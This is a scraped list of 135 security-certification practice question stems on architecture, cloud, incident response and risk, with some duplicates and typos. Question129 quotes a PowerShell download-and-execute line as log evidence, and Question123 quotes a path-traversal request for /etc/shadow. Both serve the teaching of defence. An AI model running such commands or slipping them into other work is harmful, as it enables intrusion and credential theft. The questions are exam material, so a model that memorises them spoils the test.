MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: A company has hired a security architect to address several service outages on the endpoints due to new malware. The Chief Executive Officer's laptop was impacted while working from home. The goal is to prevent further endpoint disruption. The edge network is protected by a web proxy.Which of the following solutions should the security architect recommend?
Question2: In order to authenticate employees who, call in remotely, a company's help desk staff must be able to view partial Information about employees because the full information may be considered sensitive. Which of the following solutions should be implemented to authenticate employees?
Question3: In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a Paas implementation?
Question4: A company publishes several APIs for customers and is required to use keys to segregate customer data sets.Which of the following would be BEST to use to store customer keys?
Question5: A user experiences an HTTPS connection error when trying to access an Internet banking website from a corporate laptop. The user then opens a browser on a mobile phone and is able to access the same Internet banking website without issue. Which of the following security configurations is MOST likely the cause of the error?
Question6: Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution?
Question7: An organization requires a legacy system to incorporate reference data into a new system. The organization anticipates the legacy system will remain in operation for the next 18 to 24 months. Additionally, the legacy system has multiple critical vulnerabilities with no patches available to resolve them. Which of the following is the BEST design option to optimize security?
Question8: An organization is moving its intellectual property data from on premises to a CSP and wants to secure the data from theft. Which of the following can be used to mitigate this risk?
Question9: A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open-source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away.Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed?
Question10: Law enforcement officials informed an organization that an investigation has begun. Which of the following is the FIRST step the organization should take?
Question11: An organization is implementing a new identity and access management architecture with the following objectives:Supporting MFA against on-premises infrastructureImproving the user experience by integrating with SaaS applicationsApplying risk-based policies based on locationPerforming just-in-time provisioningWhich of the following authentication protocols should the organization implement to support these requirements?
Question12: A network administrator receives a ticket regarding an error from a remote worker who is trying to reboot a laptop. The laptop has not yet loaded the operating system, and the user is unable to continue the boot process. The administrator is able to provide the user with a recovery PIN, and the user is able to reboot the system and access the device as needed. Which of the following is the MOST likely cause of the error?
Question13: The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties. Which of the following should be implemented to BEST manage the risk?
Question14: Users are claiming that a web server is not accessible. A security engineer logs for the site. The engineer connects to the server and runs netstat -an and receives the following output:
Question15: A Chief information Security Officer (CISO) is developing corrective-action plans based on the following from a vulnerability scan of internal hosts:Which of the following MOST appropriate corrective action to document for this finding?
Question16: A company's product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company's reputation in the market.Which of the following should the company implement to address the risk of system unavailability?
Question17: An organization recently started processing, transmitting, and storing its customers' credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers' information.Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?
Question18: A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.Which of the following should a security architect recommend?
Question19: A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.Which of the following should the company use to prevent data theft?
Question20: Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution?
Question21: A security auditor needs to review the manner in which an entertainment device operates. The auditor is analyzing the output of a port scanning tool to determine the next steps in the security review. Given the following log output.The best option for the auditor to use NEXT is:
Question22: A company's Chief Information Officer wants to Implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide Information on attempted attacks, and provide analysis of malicious activities to determine the processes or users Involved. Which of the following would provide this information?
Question23: A hospitality company experienced a data breach that included customer Pll. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service. Which of the following is the BEST solution to help prevent this type of attack in the future?
Question24: A company processes data subject to NDAs with partners that define the processing and storage constraints for the covered dat a. The agreements currently do not permit moving the covered data to the cloud, and the company would like to renegotiate the terms of the agreements.Which of the following would MOST likely help the company gain consensus to move the data to the cloud?
Question25: Which of the following objectives BEST supports leveraging tabletop exercises in business continuity planning?
Question26: The Chief Information Security Officer is concerned about the possibility of employees downloading 'malicious files from the internet and 'opening them on corporate workstations. Which of the following solutions would be BEST to reduce this risk?
Question27: A software house is developing a new application. The application has the following requirements:Reduce the number of credential requests as much as possibleIntegrate with social networksAuthenticate usersWhich of the following is the BEST federation method to use for the application?
Question28: Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output?
Question29: An IPSec solution is being deployed. The configuration files for both the VPN concentrator and the AAA server are shown in the diagram.Complete the configuration files to meet the following requirements:* The EAP method must use mutual certificate-based authentication (With issued client certificates).* The IKEv2 Cipher suite must be configured to the MOST secureauthenticated mode of operation,* The secret must contain at least one uppercase character, one lowercase character, one numeric character, and one special character, and it must meet a minimum length requirement of eight characters, INSTRUCTIONS Click on the AAA server and VPN concentrator to complete the configuration.Fill in the appropriate fields and make selections from the drop-down menus.VPN Concentrator:AAA Server:
Question30: A large telecommunications equipment manufacturer needs to evaluate the strengths of security controls in a new telephone network supporting first responders. Which of the following techniques would the company use to evaluate data confidentiality controls?
Question31: Which of the following BEST sets expectation between the security team and business units within an organization?
Question32: A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process 'memory location. Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?
Question33: A network administrator for a completely air-gapped and closed system has noticed that anomalous external files have been uploaded to one of the critical servers. The administrator has reviewed logs in the SIEM that were collected from security appliances, network infrastructure devices, and endpoints. Which of the following processes, if executed, would be MOST likely to expose an attacker?
Question34: A security engineer estimates the company's popular web application experiences 100 attempted breaches per day. In the past four years, the company's data has been breached two times.Which of the following should the engineer report as the ARO for successful breaches?
Question35: Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts most of the responsibility for application-level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement?
Question36: A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.Which of the following does the business's IT manager need to consider?
Question37: A security architect is tasked with securing a new cloud-based videoconferencing and collaboration platform to support a new distributed workforce. The security architect's key objectives are to:* Maintain customer trust* Minimize data leakage* Ensure non-repudiationWhich of the following would be the BEST set of recommendations from the security architect?
Question38: A security engineer needs to implement a solution to increase the security posture of user endpoints by providing more visibility and control over local administrator accounts. The endpoint security team is overwhelmed with alerts and wants a solution that has minimal operational burdens. Additionally, the solution must maintain a positive user experience after implementation.Which of the following is the BEST solution to meet these objectives?
Question39: A company suspects a web server may have been infiltrated by a rival corporation. The security engineer reviews the web server logs and finds the following:The security engineer looks at the code with a developer, and they determine the log entry is created when the following line is run:Which of the following is an appropriate security control the company should implement?
Question40: In comparison with traditional on-premises infrastructure configurations, defining ACLs in a CSP relies on:
Question41: A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems. Some of the requirements are:* Handle an increase in customer demand of resources* Provide quick and easy access to information* Provide high-quality streaming media* Create a user-friendly interfaceWhich of the following actions should be taken FIRST?
Question42: A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.Which of the following would BEST secure the company's CI/CD pipeline?
Question43: A company security engineer arrives at work to face the following scenario:1) Website defacement2) Calls from the company president indicating the website needs to be fixed Immediately because It Is damaging the brand3) A Job offer from the company's competitor4) A security analyst's investigative report, based on logs from the past six months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data Which of the following threat actors Is MOST likely involved?
Question44: A cybersecurity analyst created the following tables to help determine the maximum budget amount the business can justify spending on an improved email filtering system:Which of the following meets the budget needs of the business?
Question45: A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization's headquarters location. The solution must also have the lowest power requirement on the CA.Which of the following is the BEST solution?
Question46: A company was recently infected by malware. During the root cause analysis. the company determined that several users were installing their own applications. TO prevent further compromises, the company has decided it will only allow authorized applications to run on its systems. Which Of the following should the company implement?
Question47: A third-party organization has implemented a system that allows it to analyze customers' data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing?
Question48: Device event logs sources from MDM software as follows:Which of the following security concerns and response actions would BEST address the risks posed by the device in the logs?
Question49: Company A is establishing a contractual with Company B. The terms of the agreement are formalized in a document covering the payment terms, limitation of liability, and intellectual property rights. Which of the following documents will MOST likely contain these elements
Question50: A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform?
Question51: A security analyst is reviewing SIEM events and is uncertain how to handle a particular event. The file is reviewed with the security vendor who is aware that this type of file routinely triggers this alert.Based on this information, the security analyst acknowledges this alert Which of the following event classifications is MOST likely the reason for this action?
Question52: An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During the last two holiday seasons, the server experienced performance issues because of too many connections, and several customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this kind of performance issue.Which of the following is the MOST cost-effective solution?
Question53: A security solution uses a sandbox environment to execute zero-day software and collect indicators of compromise. Which of the following should the organization do to BEST take advantage of this solution?
Question54: A company is repeatedly being breached by hackers who valid credentials. The company's Chief information Security Officer (CISO) has installed multiple controls for authenticating users, including biometric and token-based factors. Each successive control has increased overhead and complexity but has failed to stop further breaches. An external consultant is evaluating the process currently in place to support the authentication controls. Which of the following recommendation would MOST likely reduce the risk of unauthorized access?
Question55: The Chief Information Security Officer (CISO) is working with a new company and needs a legal "document to ensure all parties understand their roles during an assessment. Which of the following should the CISO have each party sign?
Question56: A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company's Chief Financial Officer loses a phone multiple times a year.Which of the following will MOST likely secure the data on the lost device?
Question57: A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used. The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.Which of the following encryption methods should the cloud security engineer select during the implementation phase?
Question58: The Chief information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal?
Question59: A security consultant has been asked to recommend a secure network design that would:* Permit an existing OPC server to communicate with a new Modbus server that is controlling electrical relays.* Limit operational disruptions.Due to the limitations within the Modbus protocol, which of the following configurations should the security engineer recommend as part of the solution?
Question60: An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access.Which of the following describes the administrator's discovery?
Question61: A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process memory location.Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?
Question62: An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.Which of the following side-channel attacks did the team use?
Question63: A large number of emails have been reported, and a security analyst is reviewing the following information from the emails:As part of the image process, which of the following is the FIRST step the analyst should take?
Question64: A CSP, which wants to compete in the market, has been approaching companies in an attempt to gain business. The CSP is able to provide the same uptime as other CSPs at a markedly reduced cost. Which of the following would be the MOST significant business risk to a company that signs a contract with this CSP?
Question65: Which of the following indicates when a company might not be viable after a disaster?
Question66: A security analyst needs to recommend a remediation to the following threat:Which of the following actions should the security analyst propose to prevent this successful exploitation?
Question67: A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility.Which of the following systems should the consultant review before making a recommendation?
Question68: The goal of a Chief information Security Officer (CISO) providing up-to-date metrics to a bank's risk committee is to ensure:
Question69: A financial services company wants to migrate its email services from on-premises servers to a cloud-based email solution. The Chief information Security Officer (CISO) must brief board of directors on the potential security concerns related to this migration. The board is concerned about the following.* Transactions being required by unauthorized individual* Complete discretion regarding client names, account numbers, and investment information.* Malicious attacker using email to distribute malware and ransom ware.* Exfiltration of sensitivity company information.The cloud-based email solution will provide an6-malware, reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the board's concerns for this email migration?
Question70: An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following:ERR_SSL_VERSION_OR_CIPHER_MISMATCHWhich of the following is MOST likely the root cause?
Question71: An organization recently experienced a ransomware attack. The security team leader is concerned about the attack reoccurring. However, no further security measures have been implemented.Which of the following processes can be used to identify potential prevention recommendations?
Question72: A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation?
Question73: During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place. Which of the following Is the MOST likely solution?
Question74: A company in the financial sector receives a substantial number of customer transaction requests via email. While doing a root-cause analysis conceding a security breach, the CIRT correlates an unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return an findings, but the CIRT finds undocumented services running on the device. Which of the following controls would reduce the discovery time for similar in the future.
Question75: A company's Chief Information Security Officer is concerned that the company's proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.Which of the following compensating controls would be BEST to implement in this situation?
Question76: A security analyst is reviewing the following vulnerability assessment report:Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts?
Question77: A security engineer needs to recommend a solution that will meet the following requirements:Identify sensitive data in the provider's networkMaintain compliance with company and regulatory guidelinesDetect and respond to insider threats, privileged user threats, and compromised accounts Enforce datacentric security, such as encryption, tokenization, and access control Which of the following solutions should the security engineer recommend to address these requirements?
Question78: A threat analyst notices the following URL while going through the HTTP logs.Which of the following attack types is the threat analyst seeing?
Question79: An organization established an agreement with a partner company for specialized help desk services. A senior security officer within the organization Is tasked with providing documentation required to set up a dedicated VPN between the two entities. Which of the following should be required?
Question80: An analyst received a list of IOCs from a government agency. The attack has the following characteristics:1. The attack starts with bulk phishing.2. If a user clicks on the link, a dropper is downloaded to the computer.3. Each of the malware samples has unique hashes tied to the user.The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use?
Question81: Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage. Which of the following should be created to prevent this type of issue in the future?
Question82: A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment.Which of the following should the security administrator do to mitigate the risk?
Question83: An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the LEAST amount of downtime. Which of the following should the analyst perform?
Question84: A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks.Which of the following sources could the architect consult to address this security concern?
Question85: A security engineer performed an assessment on a recently deployed web application. The engineer was able to exfiltration a company report by visiting the following URL:www.intranet.abc.com/get-files.jsp?file=report.pdfWhich of the following mitigation techniques would be BEST for the security engineer to recommend?
Question86: An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party. Which of the following would BEST accomplish this goal?
Question87: A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the Jogs. the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured:Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?A) Personal health information: Inform the human resources department of the breach and review the DLP logs.B) Account history; Inform the relationship managers of the breach and create new accounts for the affected users.C) Customer IDs: Inform the customer service department of the breach and work to change the account numbers.D) PAN: Inform the legal department of the breach and look for this data in dark web monitoring.
Question88: The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.Which of the following testing methods would be BEST for the engineer to utilize in this situation?
Question89: A cloud security engineer is setting up a cloud-hosted WAF. The engineer needs to implement a solution to protect the multiple websites the organization hosts. The organization websites are:* www.mycompany.org* www.mycompany.com* campus.mycompany.com* wiki. mycompany.orgThe solution must save costs and be able to protect all websites. Users should be able to notify the cloud security engineer of any on-path attacks. Which of the following is the BEST solution?
Question90: A system administrator at a medical imaging company discovers protected health information (PHI) on a general-purpose file server. Which of the following steps should the administrator take NEXT?
Question91: Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours.Based on RPO requirements, which of the following recommendations should the management team make?
Question92: A security analyst is reviewing network connectivity on a Linux workstation and examining the active TCP connections using the command line.Which of the following commands would be the BEST to run to view only active Internet connections?
Question93: An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk?
Question94: A systems administrator at a web-hosting provider has been tasked with renewing the public certificates of all customer sites. Which of the following would BEST support multiple domain names while minimizing the amount of certificates needed?
Question95: A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN.Which of the following solutions does this describe?
Question96: Which of the following describes the system responsible for storing private encryption/decryption files with a third party to ensure these files are stored safely?
Question97: The Chief Information Security Officer (CISO) is working with a new company and needs a legal "document to ensure all parties understand their roles during an assessment. Which of the following should the CISO have each party sign?
Question98: A security consultant has been asked to identify a simple, secure solution for a small business with a single access point. The solution should have a single SSID and no guest access. The customer facility is located in a crowded area of town, so there is a high likelihood that several people will come into range every day. The customer has asked that the solution require low administrative overhead and be resistant to offline password attacks. Which of the following should the security consultant recommend?
Question99: A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.Which of the following techniques would BEST support this?
Question100: A small company needs to reduce its operating costs. vendors have proposed solutions, which all focus on management of the company's website and services. The Chief information Security Officer (CISO) insist all available resources in the proposal must be dedicated, but managing a private cloud is not an option. Which of the following is the BEST solution for this company?
Question101: A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration:Which of the following ciphers should the security analyst remove to support the business requirements?
Question102: Some end users of an e-commerce website are reporting a delay when browsing pages. The website uses TLS 1.2. A security architect for the website troubleshoots by connecting from home to the website and capturing tramc via Wire-shark. The security architect finds that the issue is the time required to validate the certificate. Which of the following solutions should the security architect recommend?
Question103: A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis.Which of the following steps would be best to perform FIRST?
Question104: A security engineer notices the company website allows users following example:hitps://mycompany.com/main.php?Country=USWhich of the following vulnerabilities would MOST likely affect this site?
Question105: A Chief Security Officer (CSO) is concerned about the number of successful ransomware attacks that have hit the company. The data Indicates most of the attacks came through a fake email. The company has added training, and the CSO now wants to evaluate whether the training has been successful. Which of the following should the CSO implement?
Question106: A Chief information Security Officer (CISO) has launched to create a rebuts BCP/DR plan for the entire company. As part of the initiative , the security team must gather data supporting s operational importance for the applications used by the business and determine the order in which the application must be back online. Which of the following be the FIRST step taken by the team?
Question107: An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PI I and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. The assessment identifies the following:1) There will be a 520,000 per day revenue loss for each day the system is delayed going into production.2) The inherent risk is high.3) The residual risk is low.4) There will be a staged deployment to the solution rollout to the contact center.Which of the following risk-handling techniques will BEST meet the organization's requirements?
Question108: A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?
Question109: A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company's managed database, exposing customer information.The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach?
Question110: An application developer is including third-party background security fixes in an application. The fixes seem to resolve a currently identified security issue. However, when the application is released to the public, report come In that a previously vulnerability has returned. Which of the following should the developer integrate into the process to BEST prevent this type of behavior?
Question111: A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on the Docker host due to a single application that is overconsuming available resources.Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers?
Question112: A help desk technician just informed the security department that a user downloaded a suspicious file from internet explorer last night. The user confirmed accessing all the files and folders before going home from work. the next morning, the user was no longer able to boot the system and was presented a screen with a phone number. The technician then tries to boot the computer using wake-on-LAN, but the system would not come up. which of the following explains why the computer would not boot?
Question113: A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?
Question114: A company just released a new video card. Due to limited supply and nigh demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's Intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk?
Question115: A software company is developing an application in which data must be encrypted with a cipher that requires the following:* Initialization vector* Low latency* Suitable for streamingWhich of the following ciphers should the company use?
Question116: A security analyst is investigating a possible buffer overflow attack. The following output was found on a user's workstation:graphic.linux_randomization.prgWhich of the following technologies would mitigate the manipulation of memory segments?
Question117: A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk?
Question118: A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls?
Question119: A security analyst is concerned that a malicious piece of code was downloaded on a Linux system. After some research, the analyst determines that the suspected piece of code is performing a lot of input/output (I/O) on the disk drive.Based on the output above, from which of the following process IDs can the analyst begin an investigation?
Question120: A small business would like to provide guests who are using mobile devices encrypted WPA3 access without first distributing PSKs or other credentials. Which of the following features will enable the business to meet this objective?
Question121: Users are reporting intermittent access issues with & new cloud application that was recently added to the network. Upon investigation, he scary administrator notices the human resources department Is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future?
Question122: The Chief Information Security Officer (CISO) asked a security manager to set up a system that sends an alert whenever a mobile device enters a sensitive area of the company's data center. The CISO would also like to be able to alert the individual who is entering the area that the access was logged and monitored. Which of the following would meet these requirements?
Question123: A network administrator who manages a Linux web server notices the following traffic:http://corr.ptia.org/.../.../.../... /etc./shadowWhich of the following Is the BEST action for the network administrator to take to defend against this type of web attack?
Question124: A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:Support all phases of the SDLC.Use tailored website portal software.Allow the company to build and use its own gateway software.Utilize its own data management platform.Continue using agent-based security tools.Which of the following cloud-computing models should the CIO implement?
Question125: Which of the following testing plans is used to discuss disaster recovery scenarios with representatives from multiple departments within an incident response team but without taking any invasive actions?
Question126: Due to locality and budget constraints, an organization's satellite office has a lower bandwidth allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to both internal and external resources while not sacrificing threat visibility.Which of the following would be the BEST option to implement?
Question127: A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks.Which of the following would be the BEST solution against this type of attack?
Question128: A security engineer is reviewing a record of events after a recent data breach incident that Involved the following:* A hacker conducted reconnaissance and developed a footprint of the company s Internet-facing web application assets.* A vulnerability in a third-party horary was exploited by the hacker, resulting in the compromise of a local account.* The hacker took advantage of the account's excessive privileges to access a data store and exfiltrate the data without detection.Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?
Question129: A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have alerted and prevented the next phase of the attack?
Question130: Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?
Question131: A financial institution has several that currently employ the following controls:* The severs follow a monthly patching cycle.* All changes must go through a change management process.* Developers and systems administrators must log into a jumpbox to access the servers hosting the data using two-factor authentication.* The servers are on an isolated VLAN and cannot be directly accessed from the internal production network.An outage recently occurred and lasted several days due to an upgrade that circumvented the approval process. Once the security team discovered an unauthorized patch was installed, they were able to resume operations within an hour. Which of the following should the security administrator recommend to reduce the time to resolution if a similar incident occurs in the future?
Question132: Ann, a CIRT member, is conducting incident response activities on a network that consists of several hundred virtual servers and thousands of endpoints and users. The network generates more than 10,000 log messages per second. The enterprise belong to a large, web-based cryptocurrency startup, Ann has distilled the relevant information into an easily digestible report for executive management . However, she still needs to collect evidence of the intrusion that caused the incident. Which of the following should Ann use to gather the required information?
Question133: An organization is designing a network architecture that must meet the following requirements:Users will only be able to access predefined services.Each user will have a unique allow list defined for access.The system will construct one-to-one subject/object access paths dynamically.Which of the following architectural designs should the organization use to meet these requirements?
Question134: The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints. Which of the following would BEST meet the requirement?
Question135: A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization.Which of the following should be the analyst's FIRST action?